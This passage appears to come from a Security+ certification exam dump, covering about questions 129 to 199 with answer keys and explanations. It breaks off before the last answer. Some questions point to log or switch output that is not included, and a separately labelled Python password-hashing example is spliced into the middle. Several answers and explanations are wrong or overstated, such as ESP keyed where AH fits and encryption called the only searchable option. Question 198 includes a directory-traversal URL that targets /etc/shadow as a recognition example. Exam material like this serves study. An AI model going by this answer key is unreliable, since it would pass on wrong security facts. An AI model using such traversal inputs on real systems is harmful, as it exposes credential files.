information, and health information stored on it. Depending on what type of data that is hosted on
the file server, the company wants different DLP rules assigned to the data. Which of the
following should the company do to help to accomplish this goal?
A. Classify the data
B. Mask the data
C. Assign the application owner
D. Perform a risk analysis
Answer: A
Explanation:
Data classification and typing schemas tag data assets so that they can be managed through the
information life cycle. A data classification schema is a decision tree for applying one or more
tags or labels to each data asset. Many data classification schemas are based on the degree of
confidentiality required:
Public (unclassified) - there are no restrictions on viewing the data. Public information presents no
risk to an organization if it is disclosed but does present a risk if it is modified or not available.
Confidential (secret) - the information is highly sensitive, for viewing only by approved persons
within the owner organization, and possibly by trusted third parties under NDA.
Critical (top secret) - the information is too valuable to allow any risk of its capture. Viewing is
severely restricted.
QUESTION 130
Which of the following allows for functional test data to be used in new systems for testing and
training purposes to protect the real data?
A. Data encryption
B. Data masking
C. Data deduplication
D. Data minimization
Answer: B
Explanation:
The main reason for applying masking to a data field is to protect data that is classified as
personally identifiable information, sensitive personal data, or commercially sensitive data.
However, the data must remain usable for the purposes of undertaking valid test cycles. It must
also look real and appear consistent. It is more common to have masking applied to data that is
represented outside of a corporate production system. In other words, where data is needed for
the purpose of application development, building program extensions and conducting various test
cycles.
https://en.wikipedia.org/wiki/Data_masking
QUESTION 131
A nuclear plant was the victim of a recent attack, and all the networks were air gapped. A
subsequent investigation revealed a worm as the source of the issue. Which of the following
BEST explains what happened?
A. A malicious USB was introduced by an unsuspecting employee.
B. The ICS firmware was outdated.
C. A local machine has a RAT installed.
D. The HVAC was connected to the maintenance vendor.
Answer: A
QUESTION 132
Under GDPR, which of the following is MOST responsible for the protection of privacy and
website user rights?
A. The data protection officer
B. The data processor
C. The data owner
D. The data controller
Answer: D
Explanation:
In GDPR and other privacy laws, the data controller has the most responsibility when it comes to
protecting the privacy and rights of the data's subject, such as the user of a website.
QUESTION 133
A user received an SMS on a mobile phone that asked for bank details.
Which of the following social-engineering techniques was used in this case?
A. SPIM
B. Vishing
C. Spear phishing
D. Smishing
Answer: D
Explanation:
SPIM is unwanted messages sent over instant messaging (IM) channels; vishing is phishing over
voice/VoIP; spear phishing targets a specific group or individual via email.
QUESTION 134
A security administrator needs to create a RAID configuration that is focused on high read speeds
and fault tolerance. It is unlikely that multiple drives will fail simultaneously. Which of the
following RAID configurations should the administrator use?
A. RAID 0
B. RAID 1
C. RAID 5
D. RAID 10
Answer: C
Explanation:
https://techgenix.com/raid-10-vs-raid-5/
QUESTION 135
A user is concerned that a web application will not be able to handle unexpected or random input
without crashing.
Which of the following BEST describes the type of testing the user should perform?
A. Code signing
B. Fuzzing
C. Manual code review
D. Dynamic code analysis
Answer: B
QUESTION 136
A security administrator checks the table of a network switch, which shows the following output:
Which of the following is happening to this switch?
A. MAC flooding
B. DNS poisoning
C. MAC cloning
D. ARP poisoning
Answer: A
QUESTION 137
A company needs to centralize its logs to create a baseline and have visibility on its security
events. Which of the following technologies will accomplish this objective?
A. Security information and event management
B. A web application firewall
C. A vulnerability scanner
D. A next-generation firewall
Answer: A
QUESTION 138
The SOC is reviewing processes and procedures after a recent incident. The review indicates it took
more than 30 minutes to determine that quarantining an infected host was the best course of
action. This allowed the malware to spread to additional hosts before it was contained.
Which of the following would be BEST to improve the incident response process?
A. Updating the playbooks with better decision points
B. Dividing the network into trusted and untrusted zones
C. Providing additional end-user training on acceptable use
D. Implementing manual quarantining of infected hosts
Answer: A
QUESTION 139
An organization has been experiencing outages during holiday sales and needs to ensure
availability of its point-of-sale systems.
The IT administrator has been asked to improve both server-data fault tolerance and site
availability under high consumer load.
Which of the following are the BEST options to accomplish this objective? (Select TWO)
A. Load balancing
B. Incremental backups
C. UPS
D. RAID
E. Dual power supply
F. NIC teaming
Answer: AD
QUESTION 140
In the middle of a cybersecurity incident, a security engineer removes the infected devices from the
network and locks down all compromised accounts. In which of the following incident response
phases is the security engineer currently operating?
A. Identification
B. Preparation
C. Eradication
D. Recovery
E. Containment
Answer: E
Explanation:
Isolation involves removing affected components from the larger environment. This can be
anything from removing a server from the network after it becomes the target of DoS attacks, to
placing applications in a VM sandbox outside the environment where the host usually runs.
Whatever the situation, you'll want to make sure there is no other interface between the affected
component and the production network or the Internet.
QUESTION 141
An organization has a growing workforce that is mostly driven by additions to the sales
department. Each newly hired salesperson relies on a mobile device to conduct business. The
Chief Information Officer (CIO) is wondering if the organization may need to scale down just as
quickly as it scaled up. The CIO is also concerned about the organization's security and customer
privacy. Which of the following would be BEST to address the CIO's concerns?
A. Disallow new hires from using mobile devices for six months
B. Select four devices for the sales department to use in a CYOD model
C. Implement BYOD for the sales department while leveraging the MDM
D. Deploy mobile devices using the COPE methodology
Answer: C
QUESTION 142
A public relations team will be taking a group of guests on a tour through the facility of a large
e-commerce company. The day before the tour, the company sends out an email to employees to
ensure all whiteboards are cleaned and all desks are cleared. The company is MOST likely trying
to protect against:
A. Loss of proprietary information
B. Damage to the company's reputation
C. Social engineering
D. Credential exposure
Answer: A
Explanation:
In the context of information security, social engineering is the psychological manipulation of
people into performing actions or divulging confidential information (think phishing, spoofing). That
is not being demonstrated in this question. The company is protecting itself from loss of
proprietary information by clearing it all out, so that if anyone on the tour is looking to take it they
will be out of luck.
QUESTION 143
A network engineer needs to create a plan for upgrading the wireless infrastructure in a large
office. Priority must be given to areas that are currently experiencing latency and connection
issues. Which of the following would be the BEST resource for determining the order of priority?
A. Nmap
B. Heat maps
C. Network diagrams
D. Wireshark
Answer: C
QUESTION 144
A security analyst is preparing a threat assessment for an upcoming internal penetration test. The analyst
needs to identify a method for determining the tactics, techniques, and procedures of a threat
against the organization's network. Which of the following will the analyst MOST likely use to
accomplish the objective?
A. A tabletop exercise
B. NIST CSF
C. MITRE ATT&CK
D. OWASP
Answer: C
QUESTION 145
A security analyst has received an alert about PII being sent via email. The analyst's Chief
Information Security Officer (CISO) has made it clear that PII must be handled with extreme care.
From which of the following did the alert MOST likely originate?
A. S/MIME
B. DLP
C. IMAP
D. HIDS
Answer: B
Explanation:
Network-based DLP monitors outgoing data looking for sensitive data. Network-based DLP
systems monitor outgoing email to detect and block unauthorized data transfers and monitor data
stored in the cloud.
QUESTION 146
A document that appears to be malicious has been discovered in an email that was sent to a
company's Chief Financial Officer (CFO).
Which of the following would be BEST to allow a security analyst to gather information and
confirm it is a malicious document without executing any code it may contain?
A. Open the document on an air-gapped network
B. View the document's metadata for origin clues
C. Search for matching file hashes on malware websites
D. Detonate the document in an analysis sandbox
Answer: D
QUESTION 147
A network engineer notices the VPN concentrator becomes overloaded and crashes on days when there
are a lot of remote workers. Senior management has placed greater importance on the availability
of VPN resources for the remote workers than the security of the end users' traffic.
Which of the following would be BEST to solve this issue?
A. IPSec
B. Always On
C. Split tunneling
D. L2TP
Answer: C
Explanation:
Some programs need VPN protection, while others can directly access the internet. Split
tunneling is an advanced VPN feature that lets you choose which programs and apps should
have a secure VPN tunnel and which could benefit from faster speeds and access to local
services. This feature reduces traffic overload on HQ servers and company data centers and
helps save costs for hardware.
QUESTION 148
A recent malware outbreak across a subnet included successful rootkit installations on many
PCs, ensuring persistence by rendering remediation efforts ineffective. Which of the following
would BEST detect the presence of a rootkit in the future?
A. FDE
B. NIDS
C. EDR
D. DLP
Answer: C
QUESTION 149
A security administrator currently spends a large amount of time on common security tasks, such
as report generation, phishing investigations, and user provisioning and deprovisioning. This
prevents the administrator from spending time on other security projects. The business does not
have the budget to add more staff members. Which of the following should the administrator
implement?
A. DAC
B. ABAC
C. SCAP
D. SOAR
Answer: D
QUESTION 150
A security analyst sees the following log output while reviewing web logs:
Which of the following mitigation strategies would be BEST to prevent this attack from being
successful?
A. Secure cookies
B. Input validation
C. Code signing
D. Stored procedures
Answer: B
QUESTION 151
A Chief Information Security Officer (CISO) is concerned about the organization's ability to
continue business operation in the event of a prolonged DDoS attack on its local datacenter that
consumes database resources. Which of the following will the CISO MOST likely recommend to
mitigate this risk?
A. Upgrade the bandwidth available into the datacenter
B. Implement a hot-site failover location
C. Switch to a complete SaaS offering to customers
D. Implement a challenge response test on all end-user queries
Answer: B
QUESTION 152
Which of the following secure coding techniques makes compromised code more difficult for
hackers to use?
A. Obfuscation
B. Normalization
C. Execution
D. Reuse
Answer: A
Explanation:
Obfuscation is the action of making something obscure, unclear, or unintelligible. In software
development, obfuscation is the act of creating code that is difficult for humans or computers to
understand.
QUESTION 153
An incident response technician collected a mobile device during an investigation. Which of the
following should the technician do to maintain chain of custody?
A. Document the collection and require a sign-off when possession changes.
B. Lock the device in a safe or other secure location to prevent theft or alteration.
C. Place the device in a Faraday cage to prevent corruption of the data.
D. Record the collection in a blockchain-protected public ledger.
Answer: A
Explanation:
Document the collection and require a sign-off when possession changes is the correct option to
maintain chain of custody when collecting a mobile device during an investigation. It is important
to document the collection process, including who collected the device, when and where it was
collected, and any other relevant details. It is also necessary to require a sign-off when
possession changes, to ensure accountability and track the device's movement. This helps
maintain the integrity of the evidence and ensures that it can be used in legal proceedings.
QUESTION 154
An organization's RPO for a critical system is two hours. The system is used Monday through
Friday, from 9:00 am to 5:00 pm. Currently, the organization performs a full backup every
Saturday that takes four hours to complete. Which of the following additional backup
implementations would be the BEST way for the analyst to meet the business requirements?
A. Incremental backups Monday through Friday at 6:00 p.m. and differential backups hourly.
B. Full backups Monday through Friday at 6:00 p.m. and incremental backups hourly.
C. Incremental backups Monday through Friday at 6:00 p.m. and full backups hourly.
D. Full backups Monday through Friday at 6:00 p.m. and differential backups hourly.
Answer: A
QUESTION 155
A security analyst discovers that a company username and password database was posted on an
internet forum. The username and passwords are stored in plan text.
Which of the following would mitigate the damage done by this type of data exfiltration in the
future?
A. Create DLP controls that prevent documents from leaving the network.
B. Implement salting and hashing.
C. Configure the web content filter to block access to the forum.
D. Increase password complexity requirements.
Answer: B
Explanation:
Salting and hashing are techniques used to protect the security of passwords stored in a
database. Salting involves adding random data, known as a "salt," to each password before it is
hashed. This makes it more difficult for attackers to crack the passwords by using pre-computed
hash tables, known as "rainbow tables." Hashing involves applying a one-way mathematical
function, known as a "hash algorithm," to the salted password to produce a fixed-length output,
known as a "hash value." This makes it impossible to determine the original password from the
hash value, even if the attacker has access to the database. By implementing salting and
hashing, the company can ensure that its passwords are protected even if the database is
compromised.
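To make the explanation concrete, here is an added Python example (not from the exam dump) that stores the same constructed sample passwords with and without a salt, using PBKDF2-HMAC-SHA256 from the standard library, and shows why an unsalted store reveals which users share a password.

```python
"""Added example (not part of the exam dump): salted password hashing as the
explanation above describes it, using PBKDF2-HMAC-SHA256 from Python's
standard library. The user names and passwords below are constructed samples."""
import hashlib
import hmac
import os
from typing import Dict, List, Optional

ITERATIONS = 600_000  # PBKDF2 work factor; raise it as hardware gets faster

# Constructed sample credential set; two users share the same password on purpose.
SAMPLE_USERS: Dict[str, str] = {
    "alice": "Winter2024!",
    "bob": "Winter2024!",
    "carol": "correct horse battery staple",
}


def unsalted_hash(password: str) -> str:
    """Plain SHA-256 of the password. Every user with the same password gets the
    same digest, which is exactly what precomputed (rainbow) tables rely on."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> str:
    """Salt and hash a password, returning a self-describing record of the form
    'pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>' for storage."""
    if salt is None:
        salt = os.urandom(16)  # fresh 128-bit random salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute the hash with the stored salt and parameters and compare it to
    the stored digest in constant time. Malformed records never verify."""
    try:
        algo, iters, salt_hex, digest_hex = record.split("$")
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(digest_hex)
        iterations = int(iters)
    except ValueError:
        return False
    if algo != "pbkdf2_sha256" or iterations < 1:
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(candidate, expected)


def store_unsalted(users: Dict[str, str]) -> Dict[str, str]:
    """What a leaked database looks like without salting: one plain digest per user."""
    return {user: unsalted_hash(pw) for user, pw in users.items()}


def store_salted(users: Dict[str, str], iterations: int = ITERATIONS) -> Dict[str, str]:
    """The same database with a per-user random salt and a slow hash."""
    return {user: hash_password(pw, iterations=iterations) for user, pw in users.items()}


def users_with_shared_digest(store: Dict[str, str]) -> List[str]:
    """Users whose stored value equals another user's. In an unsalted store this
    reveals shared passwords to anyone holding the dump; a salted store shows none."""
    by_value: Dict[str, List[str]] = {}
    for user, value in store.items():
        by_value.setdefault(value, []).append(user)
    return sorted(u for group in by_value.values() if len(group) > 1 for u in group)


if __name__ == "__main__":
    print("unsalted duplicates:", users_with_shared_digest(store_unsalted(SAMPLE_USERS)))
    print("salted duplicates:  ", users_with_shared_digest(store_salted(SAMPLE_USERS)))
    record = hash_password("Winter2024!")
    print(record)
    print(verify_password("Winter2024!", record), verify_password("winter2024!", record))
```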
QUESTION 156
After a ransomware attack a forensics company needs to review a cryptocurrency transaction
between the victim and the attacker. Which of the following will the company MOST likely review
to trace this transaction?
A. The public ledger
B. The NetFlow data
C. A checksum
D. The event log
Answer: A
QUESTION 157
Which of the following is a team of people dedicated to testing the effectiveness of organizational
security programs by emulating the techniques of potential attackers?
A. Red team
B. White team
C. Blue team
D. Purple team
Answer: A
Explanation:
Red team - performs the offensive role to try to infiltrate the target.
QUESTION 158
Which of the following job roles would sponsor data quality and data entry initiatives that ensure
business and regulatory requirements are met?
A. The data owner
B. The data processor
C. The data steward
D. The data privacy officer
Answer: C
QUESTION 159
A retail executive recently accepted a job with a major competitor. The following week, a security
analyst reviews the security logs and identifies successful logon attempts to access the departed
executive's accounts. Which of the following security practices would have addressed the issue?
A. A non-disclosure agreement
B. Least privilege
C. An acceptable use policy
D. Offboarding
Answer: D
QUESTION 160
A network administrator would like to configure a site-to-site VPN utilizing IPSec.
The administrator wants the tunnel to be established with data integrity, encryption, authentication,
and anti-replay functions.
Which of the following should the administrator use when configuring the VPN?
A. AH
B. EDR
C. ESP
D. DNSSEC
Answer: C
Explanation:
https://www.hypr.com/encapsulating-security-payload-esp/
Encapsulating Security Payload (ESP) is a member of the Internet Protocol Security (IPsec) set
of protocols that encrypt and authenticate the packets of data between computers using a Virtual
Private Network (VPN). The focus and layer on which ESP operates makes it possible for VPNs
to function securely.
QUESTION 161
Which of the following is an administrative control that would be MOST effective to reduce the
occurrence of malware execution?
A. Security awareness training
B. Frequency of NIDS updates
C. Change control procedures
D. EDR reporting cycle
Answer: A
Explanation:
Security awareness training is the administrative control that would be MOST effective to reduce
the occurrence of malware execution. Malware is often introduced to an organization's network
through human error, such as clicking on a malicious link or downloading an infected file. Security
awareness training can help educate employees on how to identify and avoid common malware
threats, such as phishing attacks, and provide best practices for safe browsing and downloading.
QUESTION 162
The Chief Security Officer (CSO) at a major hospital wants to implement SSO to help improve
the security of patient data in the environment, particularly at shared terminals. The Chief Risk
Officer (CRO) is concerned that training and guidance have not been provided to frontline staff,
and a risk analysis has not been performed.
Which of the following is the MOST likely cause of the CRO's concerns?
A. SSO would simplify username and password management, making it easier for hackers to
guess accounts.
B. SSO would reduce password fatigue, but staff would still need to remember more complex
passwords.
C. SSO would reduce the password complexity for frontline staff.
D. SSO would reduce the resilience and availability of systems if the provider goes offline.
Answer: D
QUESTION 163
A smart switch has the ability to monitor electrical levels and shut off power to a building in the
event of power surge or other fault situation. The switch was installed on a wired network in a
hospital and is monitored by the facilities department via a cloud application. The security
administrator isolated the switch on a separate VLAN and set up a patch routine. Which of the
following steps should also be taken to harden the smart switch?
A. Set up an air gap for the switch.
B. Change the default password for the switch.
C. Place the switch in a Faraday cage.
D. Install a cable lock on the switch.
Answer: B
QUESTION 164
Which of the following describes the BEST approach for deploying application patches?
A. Apply the patches to systems in a testing environment, then to systems in a staging environment,
and finally to production systems.
B. Test the patches in a staging environment, develop against them in the development
environment, and then apply them to the production systems.
C. Test the patches in a test environment, apply them to the production systems, and then apply
them to a staging environment.
D. Apply the patches to the production systems, apply them in a staging environment, and then test
all of them in a testing environment.
Answer: A
QUESTION 165
A security engineer needs to enhance MFA access to sensitive areas in a building. A key card
and fingerprint scan are already in use.
Which of the following would add another factor of authentication?
A. Hard token
B. Retina scan
C. SMS text
D. Keypad PIN
Answer: D
QUESTION 166
A symmetric encryption algorithm is BEST suited for:
A. key-exchange scalability.
B. protecting large amounts of data.
C. providing hashing capabilities.
D. implementing non-repudiation.
Answer: B
Explanation:
Symmetric encryption is a means of protecting data using a secret key to encrypt (lock) and
decrypt (unlock) it. The sender and recipient share the key or password to gain access to the
information. The key can be a word; a phrase; or a nonsensical or random string of letters,
numbers, and symbols.
QUESTION 167
A company has limited storage space available and an online presence that cannot be down for
more than four hours. Which of the following backup methodologies should the company
implement to allow for the FASTEST database restore time in the event of a failure, while being
mindful of the limited available storage space?
A. Implement full tape backups every Sunday at 8:00 p.m. and perform nightly tape rotations.
B. Implement differential backups every Sunday at 8:00 p.m. and nightly incremental backups at
8:00 p.m.
C. Implement nightly full backups every Sunday at 8:00 p.m.
D. Implement full backups every Sunday at 8:00 p.m. and nightly differential backups at 8:00 p.m.
Answer: D
Explanation:
Do not combine differential and incremental backups. Use full backups interspersed with
differential backups or full backups interspersed with incremental backups.
QUESTION 168
A security analyst is reviewing information regarding recent vulnerabilities. Which of the following
will the analyst MOST likely consult to validate which platforms have been affected?
A. OSINT
B. SIEM
C. CVSS
D. CVE
Answer: D
Explanation:
CVE is simply a list of all publicly disclosed vulnerabilities that includes the CVE ID, a description,
dates, and comments.
QUESTION 169
A security analyst needs to produce a document that details how a security incident occurred, the
steps that were taken for recovery, and how future incidents can be avoided. During which of the
following stages of the response process will this activity take place?
A. Recovery
B. Identification
C. Lessons learned
D. Preparation
Answer: C
Explanation:
Lessons learned (sometimes called the remediation step) is the final phase of incident response. It
examines and documents how well the team responded, establishes what caused the incident, and
determines how the incident can be avoided in the future.
Phases of the Incident Response Plan:
1. Preparation - Preparing for an attack and how to respond
2. Identification - Identifying the threat
3. Containment - Containing the threat
4. Eradication - Removing the threat
5. Recovery - Recovering affected systems
6. Lessons Learned - Evaluating the incident response and identifying improvements for future
incidents.
QUESTION 170
A critical file server is being upgraded and the systems administrator must determine which RAID
level the new server will need to achieve parity and handle two simultaneous disk failures.
Which of the following RAID levels meets these requirements?
A. RAID 0+1
B. RAID 2
C. RAID 5
D. RAID 6
Answer: D
QUESTION 171
Which of the following provides the BEST protection for sensitive information and data stored in
cloud-based services but still allows for full functionality and searchability of data within the cloud-based services?
A. Data encryption
B. Data masking
C. Anonymization
D. Tokenization
Answer: A
Explanation:
Data encryption is the process of converting data into a form that is unreadable by unauthorized
users. This is done by using a mathematical algorithm to scramble the data. The scrambled data
is known as ciphertext.
To decrypt the data, the user must have the encryption key. The encryption key is a secret piece
of information that is used to unscramble the ciphertext.
Data encryption is the most effective way to protect sensitive information. It is also the only option
that allows for full functionality and searchability of data within the cloud-based services.
QUESTION 172
A company uses wireless for all laptops and keeps a very detailed record of its assets, along with
a comprehensive list of devices that are authorized to be on the wireless network. The Chief
Information Officer (CIO) is concerned about a script kiddie potentially using an unauthorized
device to brute force the wireless PSK and obtain access to the internal network. Which of the
following should the company implement to BEST prevent this from occurring?
A. A BPDU guard
B. WPA-EAP
C. IP filtering
D. A WIDS
Answer: D
Explanation:
A wireless intrusion detection system (WIDS) is a device that monitors wireless traffic for
malicious activity. It can detect unauthorized devices trying to connect to the network, as well as
attempts to brute force the wireless PSK.
QUESTION 173
Which of the following would be BEST to establish between organizations that have agreed to
cooperate and are engaged in early discussion to define the responsibilities of each party, but do
not want to establish a contractually binding agreement?
A. An SLA
B. An NDA
C. A BPA
D. An MOU
Answer: D
QUESTION 174
A Chief Executive Officer's (CEO) personal information was stolen in a social engineering attack.
Which of the following sources would reveal if the CEO's personal information is for sale?
A. Automated information sharing
B. Open-source intelligence
C. The dark web
D. Vulnerability databases
Answer: C
Explanation:
The dark web is where stolen data and other illegal items are bought and sold.
QUESTION 175
An organization suffered an outage and a critical system took 90 minutes to come back online.
Though there was no data loss during the outage, the expectation was that the critical system
would be available again within 60 minutes.
Which of the following is the 60-minute expectation an example of?
A. MTBF
B. RPO
C. MTTR
D. RTO
Answer: D
QUESTION 176
A smart retail business has a local store and a newly established and growing online storefront. A
recent storm caused a power outage to the business and the local ISP, resulting in several hours
of lost sales and delayed order processing. The business owner now needs to ensure two things:
- Protection from power outages
- Always-available connectivity in case of an outage
The owner has decided to implement battery backups for the computer equipment. Which of the
following would BEST fulfill the owner's second need?
A. Lease a point-to-point circuit to provide dedicated access.
B. Connect the business router to its own dedicated UPS.
C. Purchase services from a cloud provider for high availability.
D. Replace the business's wired network with a wireless network.
Answer: C
QUESTION 177
A company recently moved sensitive videos between on-premises, company-owned websites.
The company then learned the videos had been uploaded and shared to the Internet. Which of
the following would MOST likely allow the company to find the cause?
A. Checksums
B. Watermarks
C. Order of volatility
D. A log analysis
E. A right-to-audit clause
Answer: D
Explanation:
https://www.sumologic.com/glossary/log-analysis/
"While companies can operate private clouds, forensics in a public cloud are complicated by the
right to audit permitted to you by your service level agreement (SLA) with the cloud provider."
QUESTION 178
A company's Chief Information Officer (CIO) is meeting with the Chief Information Security Officer
(CISO) to plan some activities to enhance the skill levels of the company's developers. Which of
the following would be MOST suitable for training the developers?
A. A capture-the-flag competition
B. A phishing simulation
C. Physical security training
D. Basic awareness training
Answer: A
Explanation:
Capture the Flag competitions, or CTFs, are a kind of computer security competition.
Teams of competitors (or just individuals) are pitted against each other in a test of computer
security skill.
Very often CTFs are the beginning of one's cyber security career due to their team-building
nature and competitive aspect. In addition, there isn't a lot of commitment required beyond a
weekend.
QUESTION 179
A user recently entered a username and password into a recruiting application website that had
been forged to look like the legitimate site. Upon investigation, a security analyst identifies the
following:
- The legitimate website's IP address is 10.1.1.20 and eRecruit.local
resolves to the IP
- The forged website's IP address appears to be 10.2.12.99, based on
NetFlow records
- All three of the organization's DNS servers show the website correctly
resolves to the legitimate IP
- DNS query logs show one of the three DNS servers returned a result of
10.2.12.99 (cached) at the approximate time of the suspected
compromise.
Which of the following MOST likely occurred?
A. A reverse proxy was used to redirect network traffic
B. An SSL strip MITM attack was performed
C. An attacker temporarily pwned a name server
D. An ARP poisoning attack was successfully executed
Answer: C
QUESTION 180
Local guidelines require that all information systems meet a minimum-security baseline to be
compliant. Which of the following can security administrators use to assess their system
configurations against the baseline?
A. SOAR playbook
B. Security control matrix
C. Risk management framework
D. Benchmarks
Answer: D
QUESTION 181
Which of the following would be BEST to establish between organizations to define the
responsibilities of each party, outline the key deliverables, and include monetary penalties for
breaches to manage third-party risk?
A. An ARO
B. An MOU
C. An SLA
D. A BPA
Answer: C
Explanation:
The keyword is "include monetary penalties for breaches". SLA includes penalties for not
delivering services up to contract, BPA does not.
QUESTION 182
A large industrial system's smart generator monitors the system status and sends alerts to third-party maintenance personnel when critical failures occur. While reviewing the network logs, the
company's security manager notices the generator's IP is sending packets to an internal file
server's IP. Which of the following mitigations would be BEST for the security manager to
implement while maintaining alerting capabilities?
A. Segmentation
B. Firewall whitelisting
C. Containment
D. Isolation
Answer: A
QUESTION 183
Which of the following ISO standards is certified for privacy?
A. ISO 9001
B. ISO 27002
C. ISO 27701
D. ISO 31000
Answer: C
Explanation:
ISO 27701, also abbreviated as PIMS (Privacy Information Management System), outlines a
framework for Personally Identifiable Information (PII) Controllers and PII Processors to manage
data privacy. Privacy information management systems are sometimes referred to as personal
information management systems.
QUESTION 184
Which of the following technical controls is BEST suited for the detection and prevention of buffer
overflows on hosts?
A. DLP
B. HIDS
C. EDR
D. NIPS
Answer: C
QUESTION 185
A recent audit uncovered a key finding regarding the use of a specific encryption standard in a
web application that is used to communicate with business customers. Due to the technical
limitations of its customers, the company is unable to upgrade the encryption standard.
Which of the following types of controls should be used to reduce the risk created by this
scenario?
A. Physical
B. Detective
C. Preventive
D. Compensating
Answer: D
QUESTION 186
A security assessment determines DES and 3DES are still being used on recently deployed
production servers. Which of the following did the assessment identify?
A. Unsecure protocols
B. Default settings
C. Open permissions
D. Weak encryption
Answer: D
QUESTION 187
A consultant is configuring a vulnerability scanner for a large, global organization in multiple
countries. The consultant will be using a service account to scan systems with administrative
privileges on a weekly basis, but there is a concern that hackers could gain access to the account
and pivot through the global network. Which of the following would be BEST to help
mitigate this concern?
A. Create consultant accounts for each region, each configured with push MFA notifications.
B. Create one global administrator account and enforce Kerberos authentication.
C. Create different accounts for each region, limit their logon times, and alert on risky logins.
D. Create a guest account for each region, remember the last ten passwords, and block password
reuse.
Answer: C
QUESTION 188
A security incident may have occurred on the desktop PC of an organization's Chief Executive
Officer (CEO). A duplicate copy of the CEO's hard drive must be stored securely to ensure
appropriate forensic processes and the chain of custody are followed. Which of the following
should be performed to accomplish this task?
A. Install a new hard drive in the CEO's PC, and then remove the old hard drive and place it in a
tamper-evident bag
B. Connect a write blocker to the hard drive. Then, leveraging a forensic workstation, utilize the dd
command in a live Linux environment to create a duplicate copy
C. Remove the CEO's hard drive from the PC, connect to the forensic workstation, and copy all the
contents onto a remote fileshare while the CEO watches
D. Refrain from completing a forensic analysis of the CEO's hard drive until after the incident is
confirmed; duplicating the hard drive at this stage could destroy evidence
Answer: B
Explanation:
To obtain a forensically sound image from nonvolatile storage, you need to ensure that nothing
you do alters data or metadata (properties) on the source disk or file system. A write blocker
assures this process by preventing any data on the disk or volume from being changed by
filtering write commands at the driver and OS level. Data acquisition would normally proceed by
attaching the target device to a forensics workstation or field capture device equipped with a write
blocker.
https://security.opentext.com/tableau/hardware/details/t8u
QUESTION 189
A security analyst needs to implement an MDM solution for BYOD users that will allow the
company to retain control over company emails residing on the devices and limit data exfiltration
that might occur if the devices are lost or stolen. Which of the following would BEST meet these
requirements? (Choose two.)
A. Full-device encryption
B. Network usage rules
C. Geofencing
D. Containerization
E. Application whitelisting
F. Remote control
Answer: DF
Explanation:
Containerization and remote control are two solutions that can help a security analyst implement
an MDM (Mobile Device Management) solution for BYOD (Bring Your Own Device) users that will
allow the company to retain control over company emails residing on the devices and limit data
exfiltration if the devices are lost or stolen.
Containerization allows the company to create a secure and isolated environment (container) on
the user's device to store company data, including email. This container can be managed and
secured independently from the user's personal environment on the device, ensuring that
company data is protected.
Remote control enables the security analyst to remotely access and manage the user's device.
This allows the analyst to remotely wipe company data from the device if it is lost or stolen, or to
lock or locate the device. Additionally, remote control can be used to enforce security policies and
configurations on the device to ensure it complies with the company's security requirements.
QUESTION 190
A security analyst receives the configuration of a current VPN profile and notices the
authentication is only applied to the IP datagram portion of the packet.
Which of the following should the analyst implement to authenticate the entire packet?
A. AH
B. ESP
C. SRTP
D. LDAP
Answer: B
QUESTION 191
Company engineers regularly participate in a public Internet forum with other engineers
throughout the industry. Which of the following tactics would an attacker MOST likely use in this
scenario?
A. Watering-hole attack
B. Credential harvesting
C. Hybrid warfare
D. Pharming
Answer: A
Explanation:
A watering-hole attack is one in which an attacker targets specific groups or organizations, discovers
which websites they frequent, and injects malicious code into those sites.
QUESTION 192
Employees are having issues accessing the company's website. Some employees report very
slow performance, while others cannot access the website at all. The web and security administrators
search the logs and find millions of half-open connections to port 443 on the web server. Further
analysis reveals thousands of different source IPs initiating this traffic. Which of the following
attacks is MOST likely occurring?
A. DDoS
B. Man-in-the-middle
C. MAC flooding
D. Domain hijacking
Answer: A
QUESTION 193
An organization has hired a security analyst to perform a penetration test. The analyst captures
1Gb worth of inbound network traffic to the server and transfers the pcap back to the machine for
analysis. Which of the following tools should the analyst use to further review the pcap?
A. Nmap
B. cURL
C. Netcat
D. Wireshark
Answer: D
QUESTION 194
A security analyst is investigating an incident that was first reported as an issue connecting to
network shares and the internet. While reviewing logs and tool output, the analyst sees the
following:
Which of the following attacks has occurred?
A. IP conflict
B. Pass-the-hash
C. MAC flooding
D. Directory traversal
E. ARP poisoning
Answer: E
Explanation:
Generally, the aim is to associate the attacker's MAC address with the IP address of another
host, such as the default gateway, causing any traffic meant for that IP address to be sent to the
attacker instead.
https://en.wikipedia.org/wiki/ARP_spoofing
QUESTION 195
An engineer wants to access sensitive data from a corporate-owned mobile device. Personal data
is not allowed on the device. Which of the following MDM configurations must be considered
when the engineer travels for business?
A. Screen locks
B. Application management
C. Geofencing
D. Containerization
Answer: D
QUESTION 196
An organization's Chief Security Officer (CSO) wants to validate the business's involvement in the
incident response plan to ensure its validity and thoroughness. Which of the following will the
CSO MOST likely use?
A. An external security assessment
B. A bug bounty program
C. A tabletop exercise
D. A red-team engagement
Answer: C
QUESTION 197
A company recently experienced a data breach and the source was determined to be an
executive who was charging a phone in a public area. Which of the following would MOST likely
have prevented this breach?
A. A firewall
B. A device PIN
C. A USB data blocker
D. Biometrics
Answer: C
Explanation:
Malicious USB charging cables and plugs are also a widespread problem. As with card skimming,
a device may be placed over a public charging port at airports and other transit locations. A USB
data blocker can provide mitigation against these juice-jacking attacks by preventing any sort of
data transfer when the smartphone or laptop is connected to a charge point.
QUESTION 198
A cybersecurity analyst reviews the log files from a web server and sees a series of files that
indicates a directory-traversal attack has occurred. Which of the following is the analyst MOST
likely seeing?
A. http://sample.url.com/<script>Please-Visit-Our-Phishing-Site</script>
B. http://sample.url.com/someotherpageonsite/../../../etc/shadow
C. http://sample.url.com/select-from-database-where-password-null
D. http://redirect.sameple.url.sampleurl.com/malicious-dns-redirect
Answer: B
Explanation:
According to Dion Training, whenever you see "../../../../..", it is directory traversal.
QUESTION 199
A worldwide manufacturing company has been experiencing email account compromises. In one
incident, a user logged in from the corporate office in France, but then seconds later, the same
user account attempted a login from Brazil. Which of the following account policies would BEST
prevent this type of attack?
A. Network location
B. Impossible travel time
C. Geolocation
D. Geofencing
